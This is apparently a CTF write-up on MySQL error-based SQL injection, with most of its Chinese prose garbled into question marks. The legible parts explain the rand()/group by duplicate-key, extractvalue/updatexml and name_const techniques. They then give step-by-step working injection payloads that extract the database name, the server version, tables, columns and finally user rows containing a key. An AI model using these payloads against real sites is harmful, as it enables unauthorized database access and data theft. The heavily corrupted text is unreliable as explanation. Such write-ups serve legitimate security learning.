???????????????ü???????????????1??????????ctf?????????????????here
???????????????????Щ???????????????????????????????????????£?P
????0x00 ??????????
???????????????????????????????sql????????sql????ì???????????????????????????????????е???????????????????????????????????????????????????????????????
????0x01  ???????????sql??????????????????mysql??????????????????????д?????????????????????
??????????  ???? rand()  ??  group by ?????
???????????1???rand()??????group by ??mysql?е?????棬???????????????group by part of rand() returns duplicate key error???bug??
????RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
????You cannot use a column with RAND() values in an ORDER BY clause?? because ORDER BY would evaluate the column multiple times.
???????bug????duplicate key??????????????????????????P
?????????username=admin' and (select 1 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(?????????????sql???))x from information_schema.tables group by x )a) and '1' = '1
?????????? XPATH?????
??????????????????ExtractValue()??UpdateXML()??2????????????mysql 5.1????????????XML????????????????????????????????5.1?汾???
??????sql???
????????EXTRACTVALUE (XML_document?? XPath_string);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
??????????????XML?з???????????????????
??????:UPDATEXML (XML_document?? XPath_string?? new_value);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
????????????????new_value??String??????滻????????????????????
????????????????з?????????????
?????????????????????????????XPath_string(Xpath???)????????????????????????????32λ???????????mid?????
???????1??username=admin' and (extractvalue(1?? concat(0x7e??(?????????????sql???)))) and '1'='1
???????2??username=admin' and (updatexml(1?? concat(0x7e??(?????????????sql???))??1)) and '1'='1
??????????? ????б????????????????????????????????????????????????????????????????????????????????
???????????
????payload  id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version??0))a+join+(select+name_const(@@version??0))b)c)
????0x02  ???
?????????????????????????????°????????????
?????????????????????????????   ?????r0866cplushua
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select database()))x from information_schema.tables group by x )a) and '1' = '1
????????????????汾  ???:5.1.61-Alibaba-rds-201404-log
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select version()))x from information_schema.tables group by x )a) and '1' = '1
????????????????   ?????log    motto   user  ???????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.tables where table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
??????????????????  ?????id  username  motto?????????????????user??????????????????????????????motto?????????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.columns where table_name='motto' and table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
???????????????   ?????key#notfound!#    (???????????XPATH?????????????????????????????????????)
????username=admin%27%20and%20(extractvalue(1??%20concat(0x7e??(SELECT%20concat(username??0x3a??motto)%20FROM%20motto%20limit%203??1))))%20and%20%271%27=%271
?????????????????????????????????????????????????????????????·?????????лл????????????????????Щ??????????????